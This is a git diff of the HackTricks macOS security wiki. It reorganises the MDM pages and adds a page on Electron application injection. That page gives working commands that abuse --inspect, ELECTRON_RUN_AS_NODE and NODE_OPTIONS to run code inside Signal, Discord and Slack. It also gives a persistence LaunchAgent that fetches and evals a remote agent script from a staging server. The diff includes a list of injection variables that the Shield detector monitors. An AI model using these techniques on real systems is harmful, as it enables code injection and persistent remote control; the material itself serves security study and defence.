diff --git a/.gitbook/assets/Pasted Graphic 14.png b/.gitbook/assets/Pasted Graphic 14.png
new file mode 100644
index 000000000..8443160fd
Binary files /dev/null and b/.gitbook/assets/Pasted Graphic 14.png differ
diff --git a/SUMMARY.md b/SUMMARY.md
index 755f360a7..02af49b61 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -144,9 +144,6 @@
* [macOS AppleFS](macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md)
* [macOS Kernel](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md)
* [macOS Kernel Extensions](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md)
- * [macOS MDM](macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md)
- * [Enrolling Devices in Other Organisations](macos-hardening/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md)
- * [macOS Serial Number](macos-hardening/macos-security-and-privilege-escalation/macos-mdm/macos-serial-number.md)
* [macOS Network Services & Protocols](macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md)
* [macOS Bypassing Firewalls](macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md)
* [macOS File Extension & URL scheme app handlers](macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md)
@@ -162,6 +159,7 @@
* [macOS XPC Connecting Process Check](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-connecting-process-check.md)
* [macOS PID Reuse](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md)
* [macOS XPC Authorization](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md)
+ * [macOS Electron Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md)
* [macOS Function Hooking](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md)
* [macOS Library Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md)
* [macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES](macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
@@ -173,7 +171,10 @@
* [macOS TCC](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md)
* [macOS Apple Scripts](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-scripts.md)
* [macOS Users](macos-hardening/macos-security-and-privilege-escalation/macos-users.md)
-* [macOS Red Teaming](macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming.md)
+* [macOS Red Teaming](macos-hardening/macos-red-teaming/README.md)
+ * [macOS MDM](macos-hardening/macos-red-teaming/macos-mdm/README.md)
+ * [Enrolling Devices in Other Organisations](macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md)
+ * [macOS Serial Number](macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md)
* [macOS Useful Commands](macos-hardening/macos-useful-commands.md)
* [macOS Auto Start Locations](macos-hardening/macos-auto-start-locations.md)
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming.md b/macos-hardening/macos-red-teaming/README.md
similarity index 97%
rename from macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming.md
rename to macos-hardening/macos-red-teaming/README.md
index 625624428..9c6b22441 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming.md
+++ b/macos-hardening/macos-red-teaming/README.md
@@ -27,8 +27,8 @@ For red teaming in MacOS environments it's highly recommended to have some under
And also about **MacOS** "special" **network** **protocols**:
-{% content-ref url="macos-protocols.md" %}
-[macos-protocols.md](macos-protocols.md)
+{% content-ref url="../macos-security-and-privilege-escalation/macos-protocols.md" %}
+[macos-protocols.md](../macos-security-and-privilege-escalation/macos-protocols.md)
{% endcontent-ref %}
## Active Directory
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md b/macos-hardening/macos-red-teaming/macos-mdm/README.md
similarity index 100%
rename from macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md
rename to macos-hardening/macos-red-teaming/macos-mdm/README.md
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md b/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md
similarity index 100%
rename from macos-hardening/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md
rename to macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/macos-serial-number.md b/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md
similarity index 100%
rename from macos-hardening/macos-security-and-privilege-escalation/macos-mdm/macos-serial-number.md
rename to macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md
diff --git a/macos-hardening/macos-security-and-privilege-escalation/README.md b/macos-hardening/macos-security-and-privilege-escalation/README.md
index 050211498..1bfb7d5dc 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/README.md
@@ -60,8 +60,8 @@ If you are not familiar with macOS, you should start learning the basics of macO
In companies **macOS** systems are highly probably going to be **managed with a MDM**. Therefore, from the perspective of an attacker is interesting to know **how that works**:
-{% content-ref url="macos-mdm/" %}
-[macos-mdm](macos-mdm/)
+{% content-ref url="../macos-red-teaming/macos-mdm/" %}
+[macos-mdm](../macos-red-teaming/macos-mdm/)
{% endcontent-ref %}
### MacOS - Inspecting, Debugging and Fuzzing
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md
index 3e6d7ad4e..f8556435b 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md
@@ -379,6 +379,16 @@ cat procs.txt
Or use `netstat` or `lsof`
+### Libgmalloc
+
+
+
+{% code overflow="wrap" %}
+```bash
+lldb -o "target create `which some-binary`" -o "settings set target.env-vars DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib" -o "run arg1 arg2" -o "bt" -o "reg read" -o "dis -s \$pc-32 -c 24 -m -F intel" -o "quit"
+```
+{% endcode %}
+
### Fuzzers
#### [AFL++](https://github.com/AFLplusplus/AFLplusplus)
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md
index e88b64985..11986eaee 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md
@@ -40,6 +40,30 @@ Inter Process Communication (IPC) refers to different methods by which separate
[macos-ipc-inter-process-communication](../mac-os-architecture/macos-ipc-inter-process-communication/)
{% endcontent-ref %}
+### Electron Applications Injection
+
+Electron applications executed with specific env variables could be vulnerable to process injection:
+
+{% content-ref url="macos-electron-applications-injection.md" %}
+[macos-electron-applications-injection.md](macos-electron-applications-injection.md)
+{% endcontent-ref %}
+
+## Detection
+
+### Shield
+
+[**Shield**](https://theevilbit.github.io/shield/) ([**Github**](https://github.com/theevilbit/Shield)) is an open source application that can **detect and block process injection** actions:
+
+* Using **Environmental Variables**: It will monitor the presence of any of the following environmental variables: **`DYLD_INSERT_LIBRARIES`**, **`CFNETWORK_LIBRARY_PATH`**, **`RAWCAMERA_BUNDLE_PATH`** and **`ELECTRON_RUN_AS_NODE`**
+* Using **`task_for_pid`** calls: To find when one process wants to get the **task port of another** which allows to inject code in the process.
+* **Electron apps params**: Someone can use **`--inspect`**, **`--inspect-brk`** and **`--remote-debugging-port`** command line argument to start an Electron app in debugging mode, and thus inject code to it.
+* Using **symlinks** or **hardlinks**: Typically the most common abuse is to **place a link with our user privileges**, and **point it to a higher privilege** location. The detection is very simple for both hardlink and symlinks. If the process creating the link has a **different privilege level** than the target file, we create an **alert**. Unfortunately in the case of symlinks blocking is not possible, as we don’t have information about the destination of the link prior creation. This is a limitation of Apple’s EndpointSecuriy framework.
+
+## References
+
+* [https://theevilbit.github.io/shield/](https://theevilbit.github.io/shield/)
+* [https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f)
+
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
new file mode 100644
index 000000000..28eeea3b2
--- /dev/null
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
@@ -0,0 +1,97 @@
+# macOS Electron Applications Injection
+
+
+
+☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+
+
+## Inspect Electron Application
+
+According to [**this**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f), if you execute an Electron application with flags such as **`--inspect`**, **`--inspect-brk`** and **`--remote-debugging-port`**, a **debug port will be open** so you can connect to it (for example from Chrome in `chrome://inspect`) and you will be able to **inject code on it** or even launch new processes.\
+For example:
+
+{% code overflow="wrap" %}
+```bash
+/Applications/Signal.app/Contents/MacOS/Signal --inspect=9229
+# Connect to it using chrome://inspect and execute a calculator with:
+require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')
+```
+{% endcode %}
+
+{% hint style="danger" %}
+Note that now most Electron applications will ignore node parameters (such as --inspect) when launched unless the env variable **`ELECTRON_RUN_AS_NODE`** is set.
+
+However, you could still use the electron param `--remote-debugging-port=9229` but the previous payload won't work to execute other processes.
+{% endhint %}
+
+## `ELECTRON_RUN_AS_NODE`
+
+According to [**the docs**](https://www.electronjs.org/docs/latest/api/environment-variables#electron\_run\_as\_node), if this env variable is set, it will start the process as a normal Node.js process.
+
+{% code overflow="wrap" %}
+```bash
+# Run this
+ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord
+# Then from the nodeJS console execute:
+require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')
+```
+{% endcode %}
+
+As [**proposed here**](https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks/), you could abuse this env variable in a plist to maintain persistence:
+
+```xml
+
+
+
+
+ EnvironmentVariables
+
+ ELECTRON_RUN_AS_NODE
+ true
+
+ Label
+ com.xpnsec.hideme
+ ProgramArguments
+
+ /Applications/Slack.app/Contents/MacOS/Slack
+ -e
+ const { spawn } = require("child_process"); spawn("osascript", ["-l","JavaScript","-e","eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding( $.NSData.dataWithContentsOfURL( $.NSURL.URLWithString('http://stagingserver/apfell.js')), $.NSUTF8StringEncoding)));"]);
+
+ RunAtLoad
+
+
+
+```
+
+### `ELECTRON_RUN_AS_NODE` & `NODE_OPTIONS`
+
+With this combination you could store the payload in a different file and execute that file:
+
+{% code overflow="wrap" %}
+```bash
+# Content of /tmp/payload.js
+require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Ca$
+
+# Execute
+NODE_OPTIONS="--require /tmp/payload.js" ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord
+```
+{% endcode %}
+
+
+
+☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md
index b3175137a..d60e7c376 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md
@@ -163,7 +163,7 @@ system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistC
The Malware Removal Tool (MRT) is another part of macOS's security infrastructure. As the name suggests, MRT's main function is to **remove known malware from infected systems**.
-Once malware is detected on a Mac (either by XProtect or by some other means), MRT can be used to automatically **remove the malware**. MRT operates silently in the background and typically runs whenever the system is updated or when a new malware definition is downloaded.
+Once malware is detected on a Mac (either by XProtect or by some other means), MRT can be used to automatically **remove the malware**. MRT operates silently in the background and typically runs whenever the system is updated or when a new malware definition is downloaded (it looks like the rules MRT has to detect malware are inside the binary).
While both XProtect and MRT are part of macOS's security measures, they perform different functions:
@@ -174,7 +174,9 @@ While both XProtect and MRT are part of macOS's security measures, they perform
### SIP - System Integrity Protection
-
+{% content-ref url="macos-sip.md" %}
+[macos-sip.md](macos-sip.md)
+{% endcontent-ref %}
### Sandbox